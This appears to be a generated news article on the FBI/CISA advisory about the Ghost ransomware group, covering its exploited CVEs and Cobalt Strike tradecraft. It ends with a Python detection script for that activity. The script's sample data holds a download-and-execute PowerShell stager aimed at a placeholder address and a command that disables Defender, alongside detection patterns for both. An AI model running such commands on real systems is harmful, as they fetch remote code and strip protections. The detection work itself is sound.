Ethical Hacking News
The Ghost ransomware crew remains active and potent, targeting unpatched systems and exploiting known vulnerabilities to infect targets. By understanding their tactics and taking proactive measures, organizations can reduce their risk of falling prey to this threat.
The Ghost ransomware crew is a notorious group that continues to haunt IT departments worldwide, targeting critical infrastructure and entities across various sectors. The group's tactics remain consistent: it exploits known vulnerabilities in unpatched systems, including CVE-2018-13379, CVE-2010-2861, and CVE-2009-3960. Organizations that have patched these flaws, or that have other controls in place, are usually skipped; when Ghost runs into a hardened system, it tends to move on to its next target rather than dig in. A successful compromise typically starts with the upload of a web shell backdoor, which the gang uses to launch Cobalt Strike Beacon, steal process tokens, move laterally through the network, and infect more devices with malware. Cobalt Strike, a legitimate security-testing tool abused in cracked form, is central to how the group deploys its payloads and spreads across networks. Organizations can reduce their risk with "Infosec 101" measures: patching known vulnerabilities, maintaining backups, and monitoring networks for suspicious activity, in particular unauthorized use of PowerShell.
The Ghost ransomware crew, a notorious group of cybercriminals, continues to haunt IT departments and organizations worldwide, wreaking havoc on critical infrastructure and entities across various sectors. According to a joint advisory issued by the FBI and the US Cybersecurity and Infrastructure Security Agency (CISA), this spectral menace remains active and potent, with victims in over 70 countries, including some in China.
The Ghost group first emerged in 2021 and has been identified by various aliases over time, including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Despite the numerous names, their favored tactics remain consistent: targeting unpatched systems to exploit known vulnerabilities that allow them to infect targets. The group's preferred flaws include CVE-2018-13379, a critical path traversal flaw in Fortinet FortiOS appliances; CVE-2010-2861 and CVE-2009-3960 in servers running Adobe ColdFusion; CVE-2019-0604, a critical remote code execution vulnerability in Microsoft SharePoint; and CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, a series of flaws in Microsoft Exchange that can be chained together in ProxyShell attacks.
If an organization has applied patches for these problems or has adopted some other security controls, it is likely that Ghost will float right past their system and onto its next potential victim. The group's actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral movement to other devices.
If a target organization falls prey to the Ghost gang, it can expect a range of nefarious activities. After an initial compromise using one of the known flaws, Ghost uploads a web shell backdoor to the compromised server, then uses it to run Windows Command Prompt and/or PowerShell commands that execute Cobalt Strike Beacon on the victim's Windows system. A likely next move is to use Cobalt Strike functionality to steal process tokens from processes running as SYSTEM. With those tokens in hand, the gang uses the elevated privileges they confer to move laterally through the network, run PowerShell commands on additional systems, and infect more devices with Cobalt Strike.
Cobalt Strike is a legitimate security-testing tool that has been co-opted by criminals who use cracked versions to deploy malware, move laterally across networks, and engage in other illicit activities. The Ghost gang uses the software to display a list of running processes, collect passwords that allow them to access more devices, and disable any antivirus software on compromised machines.
The FBI and CISA have issued a joint advisory warning organizations about the Ghost ransomware crew's tactics and providing guidance on how to prevent being targeted. The document includes a long list of indicators of compromise, including MD5 file hashes associated with Ghost ransomware activity and email addresses used in Ghost ransom notes. It also advises "Infosec 101" tactics such as patching known vulnerabilities and maintaining system backups.
In cases where backups were unaffected by the ransomware attack, victims often restored operations without needing to contact the Ghost actors or pay a ransom. The Feds also emphasize that monitoring networks for unauthorized use of PowerShell is crucial in detecting potential Ghost infections, since the group leans on it at nearly every step after initial access.
Together with the indicators of compromise, the advisory's mitigation guidance is the best-practices reference organizations should use to detect and respond to potential Ghost ransomware attacks.
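The detection advice above (watch for unauthorized PowerShell) and the attack chain described earlier (web shell, then cmd/PowerShell, then Cobalt Strike Beacon, then antivirus tampering) can be turned into concrete detection logic. The following Python is an added example written for this page, not code from the FBI/CISA advisory or from The Register. It runs over a handful of constructed Sysmon-style process-creation (Event ID 1) and PowerShell script-block (Event ID 4104) records embedded inline; the field names, the list of web-server parent processes, and the 192.0.2.10 address in the sample stager are assumptions for illustration, not indicators taken from the advisory.

```python
"""Flag the web-shell -> shell -> PowerShell -> Beacon pattern in Windows telemetry.

Added example for this page. Input records are constructed Sysmon-style
dicts, not real logs; field names mirror Sysmon's Event ID 1 / 4104 schema
by assumption.
"""
import base64
import re

# Web-facing server processes that should essentially never spawn a shell
# (IIS worker hosts Exchange/SharePoint; ColdFusion is the other page target).
# Assumption: illustrative list, tune it to your own estate.
WEB_PARENTS = {"w3wp.exe", "coldfusion.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELLS = {"powershell.exe", "pwsh.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Flags that hide the window, skip the profile, or bypass execution policy.
EVASION_FLAGS = re.compile(
    r"-nop(?:rofile)?\b|-w(?:indowstyle)?\s+hidden|-ex(?:ecutionpolicy)?\s+bypass", re.I)
# Classic download cradles used to pull a Beacon stager.
CRADLE = re.compile(
    r"\bIEX\b|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I)
# Defender tampering via the real Set-MpPreference cmdlet.
AV_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+", re.I)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode PowerShell's -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_process_event(ev):
    """Return the list of reasons a Sysmon process-creation event looks like Ghost tradecraft."""
    reasons = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if parent in WEB_PARENTS and image in SHELLS:
        reasons.append(f"web server process {parent} spawned {image} (web shell pattern)")
    if image in POWERSHELLS:
        if EVASION_FLAGS.search(cmd):
            reasons.append("powershell launched with profile/window/policy evasion flags")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded powershell command")
            if CRADLE.search(decoded):
                reasons.append("download cradle in decoded command")
    return reasons


def classify_scriptblock_event(ev):
    """Return reasons a PowerShell 4104 script-block event looks hostile."""
    text = ev.get("ScriptBlockText", "")
    reasons = []
    if AV_TAMPER.search(text):
        reasons.append("Defender tampering via Set-MpPreference")
    if CRADLE.search(text):
        reasons.append("download cradle in script block")
    return reasons


def run_detection(events):
    """Return [(index, reasons)] for every event that triggered at least one rule."""
    alerts = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1:
            reasons = classify_process_event(ev)
        elif ev.get("EventID") == 4104:
            reasons = classify_scriptblock_event(ev)
        else:
            reasons = []
        if reasons:
            alerts.append((i, reasons))
    return alerts


def encode_ps(script):
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (assumed schema; 192.0.2.10 is a documentation address).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGER)},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},  # benign admin script
    {"EventID": 4104, "ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true"},
]

if __name__ == "__main__":
    for idx, why in run_detection(SAMPLE_EVENTS):
        print(idx, "; ".join(why))
```

The parent/child rule is the highest-signal piece: an IIS or ColdFusion worker process spawning cmd.exe is rare enough in most estates to page on directly, whereas the `-w hidden` and encoded-command rules will also catch legitimate scheduled tasks and management tooling and need allow-listing before they are promoted from hunting queries to alerts.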
In conclusion, the Ghost ransomware crew represents a persistent threat to global cybersecurity, with tactics that have stayed remarkably consistent since 2021 precisely because they keep working against unpatched systems. By understanding their methods and taking proactive measures such as patching vulnerabilities, maintaining backups, and monitoring networks for suspicious activity, organizations can reduce their risk of falling prey to this menace.
Related Information:
https://go.theregister.com/feed/www.theregister.com/2025/02/20/fbi_beware_of_ghost_ransomware/
https://www.msn.com/en-us/crime/general/ghost-ransomware-crew-continues-to-haunt-it-depts-with-scarily-bad-infosec/ar-AA1zq1UD
https://forums.theregister.com/forum/all/2025/02/20/fbi_beware_of_ghost_ransomware/
https://nvd.nist.gov/vuln/detail/CVE-2018-13379
https://www.cvedetails.com/cve/CVE-2018-13379/
https://nvd.nist.gov/vuln/detail/CVE-2010-2861
https://www.cvedetails.com/cve/CVE-2010-2861/
https://nvd.nist.gov/vuln/detail/CVE-2009-3960
https://www.cvedetails.com/cve/CVE-2009-3960/
https://nvd.nist.gov/vuln/detail/CVE-2019-0604
https://www.cvedetails.com/cve/CVE-2019-0604/
https://nvd.nist.gov/vuln/detail/CVE-2021-34473
https://www.cvedetails.com/cve/CVE-2021-34473/
https://nvd.nist.gov/vuln/detail/CVE-2021-34523
https://www.cvedetails.com/cve/CVE-2021-34523/
https://nvd.nist.gov/vuln/detail/CVE-2021-31207
https://www.cvedetails.com/cve/CVE-2021-31207/
Published: Thu Feb 20 03:25:08 2025 by llama3.2 3B Q4_K_M